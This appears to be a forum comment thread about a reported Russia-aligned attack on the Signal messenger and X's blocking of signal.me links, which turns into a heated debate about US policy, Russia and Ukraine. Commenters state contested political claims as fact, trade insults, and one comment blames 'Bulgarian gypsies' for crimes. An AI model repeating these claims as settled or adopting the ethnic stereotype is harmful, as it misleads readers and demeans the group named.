That's part of the propaganda. Please ignore the Internet Research Agency's massive army of troll farms and bots. Please ignore that they controlled half of the largest American Facebook groups catering to racial identity or religion. Nothing to see and no impact.
Impossible! These are our newly minted allies.
Ok I laughed! :) But it's crazy if you think about it, isn't it?
New allies, same as the old allies.
So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.
I'm not going to psychoanalyse the brain parasite, but I imagine the reason could be as petty as when he shadow-banned people with Fediverse (e.g. Mastodon) handles in their bios shortly after he took over.

Also:

> Signal has been a primary method of communication for federal workers looking to blow the whistle on DOGE.

(from https://www.disruptionist.com/p/elon-musks-x-blocks-links-to...)

Btw, I don't live in the US, but I sketched a simple tool to prevent X from censoring Signal.me links: https://link-in-a-box.vercel.app

Only signal.me links were blocked, as far as I understood; other Signal links kept working. (I have no first-hand knowledge, as I left Twitter when the owner changed.)
Unrelated most likely, signal.me is a legitimate domain used by Signal. Doubt twitter is so on top of Threat Analysis when they fumbled their own redirects from twitter.com to x.com for a while.
Not really; the domain block was reportedly due to increased spam activity from that domain and was performed automatically, so it would follow that a write-up would come a few days later. That is, if they are related, which is not a given.
Musk calls everything he doesn't like "spam", so of course it was.
It's still a social media platform; not every action taken is some nebulous part of Musk's agenda. Odds are there was an influx of posts from the signal.me domain that qualified as spam and were marked by an automated system, because they were spam. Suggesting otherwise is baseless speculation.
Given that Musk has deliberately blocked links to whole other domains before for extremely petty reasons, I don't see why we should give him the benefit of the doubt.
>So a few days ago Elon Musk blocked all links to Signal from the X platform and now this... Could be a coincidence but the timing sure is sus.

Not surprising considering Russian Oligarchs enabled Musk's takeover of Twitter:

https://www.dw.com/en/what-do-xs-alleged-ties-to-russian-oli...

The US was never the “hero,” you’re just not used to broad shifts in US policy broadcast so loudly. But this has happened numerous times in the past to other “allies.”
This is the glib oversimplification he was complaining about, delivered as a haughty, poorly informed statement.

We have never done it with an ally this critical, of this size, with this level of investment. Yes, we have done it with smaller, less critical nations very often, and it is of course atrocious. In fact, Saddam, Bin Laden, and others were all originally our allies whom we betrayed.

But we never did it against an aggressive nuclear power invading Europe.

> Saddam, Bin Laden, and others were all originally our allies whom we betrayed.

They were not allies, or not at all in the same sense. They were people the US did business with because of a common enemy, and then stopped doing business with when the situation changed. I don't think Saddam or Bin Laden thought for a moment that they were allies of the US, like Denmark and Japan are.

So you … agree? But are so set on disagreeing you frame it that way? Do you even listen to yourself?
True, but Europe has been relying on Russian oil for decades now, and the attempt to restrain Russia's influence on European powers has become a great strain on the US. It pushed Russia closer to China and made it more likely that the US would get drawn into interminable proxy wars with a powerful eastern alliance, at the expense of its economic development. While I'm not a fan of Putin, I can't see any strategic problems with the move.
Why would people give the most significant political events of this century so far "a rest"?
Because this thread is about a (potential) technological flaw in a communication app. It has nothing to do with the sitting US president.
The thread is about an attack by Russia on the app, which is American, and used by Americans and their allies. The President's policy toward those allies and Russia can have a substantial effect on whether Russia will risk attacking it or whether American security will protect Signal, its users, or its Ukrainian military users.
This has nothing to do with politics. Popping Signal is quaint because it's a channel, not an asset. You don't need to compromise the channel if you have alternate routes to acquire the assets.

edit: I will not reply further. What I said would be true regardless of the economic policy or partisan identification of the administration.

ahem...

> The sitting US President is literally a Russian asset. He is directing his team to divide up a country that Russia invaded in a summit that is not including that country, and stealing a half trillion in their sovereign mineral wealth without their consent. Calling their president an incompetent dictator and claiming being invaded was somehow their fault.

Alphabet is working in tandem with the Ukrainian SBU? Interesting choice, just as the US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago). I wonder how long the Alphabet higher-ups will allow this thing to unfold, or maybe they're not so good at reading the geopolitical tea leaves.
> US President has called Zelensky a dictator (and for good reason, Poroshenko, the previous Ukrainian president, has basically said the same thing a few days ago)

You can't be serious that you consider that to be a good enough reasoning.

Zelensky's support / approval rating is well over 50% (according to polls). Zelensky defeated Poroshenko, getting 73% of the vote in the 2019 election.

> Zelensky defeated Poroshenko

And yet he still felt the need to start politically repressing Poroshenko with sanctions and branding him a traitor, that's the mark of having a dictator in command of things.

Maybe because Poroshenko is an oligarch and a piece of shit?
They're calling Zelensky a dictator because his term was originally scheduled to end in 2024 unless he was re-elected, and there have been no elections since the beginning of the war.

The problem with this assertion is that Ukraine has "no elections under martial law" written into the law. Zelensky himself actually wanted to do some kind of election to reinforce his mandate while his support was still very high, but there was serious concern from the liberals about those plans on the basis that any election held under martial law, with large numbers of people mobilized to fight, 20% of the country occupied, and many millions of refugees unable to vote, would hardly be free and fair. Their pushback scuttled any plans for the parliament to amend said law.

Why are you repeating Kremlin's talking points?

Using the exact same reasoning, Churchill would be a dictator, too.

Highly likely...
Is this why twitter has been blocking signal.me links? https://news.ycombinator.com/item?id=43076710
State-aligned, huh? This is the US State Department talking point equivalent of a movie poster that brags, "From the studio that brought you..."
Why is computer technology getting politicized ("Russia-aligned")? When Bulgarian gypsies commit crimes in Germany, say, the media is banned from revealing their ethnic background, which hurts the vast majority of Bulgarians directly and indirectly, since Germans have no idea the thieves were gypsies. Yet it's okay to vilify a whole nation such as Russia in movies, in the news, and so on. Shame on you, "technologists" and "artists"!
It isn't that bad in the comment sections of German newspapers, where people are more open to diverse opinions. If a center-right newspaper like "Die Welt" or "Focus" runs an anti-Russian article, you can easily have 80% of 1,000 comments demanding peace negotiations and an end to the whole business. And they are real comments, because the German is so idiomatic, with regional dialects, that it would be hard to fake even for an AI.

Also, in the Financial Times the comment sections can be split 50/50.

By the way, the excessive use of the "Russian hacker" meme has been a source of amusement in the German hacker scene even before 2022.

Bulgarian gypsies (what?) didn’t start a war against Germany, Nikolay.
It's the principle. Germans started the most destructive war in human history, but they are not vilified as much as the Russians!
twaKJ · 1 day ago
If Russia retreats from the occupied territories, heaps guilt on itself for the next 80 years and does not start new wars, it won't be vilified 80 years from now.

Also, of course, Germany and WW2 are mentioned constantly in Russia itself even today, while most new wars in the past 40 years have been started by the US or Russia.

What Germany did is many orders of magnitude worse than what Russia does in Ukraine. If you think both are similar, you have no heart, and possibly no brain either!
nomat · 1 day ago
Well, for one, they're targeting Ukrainian soldiers...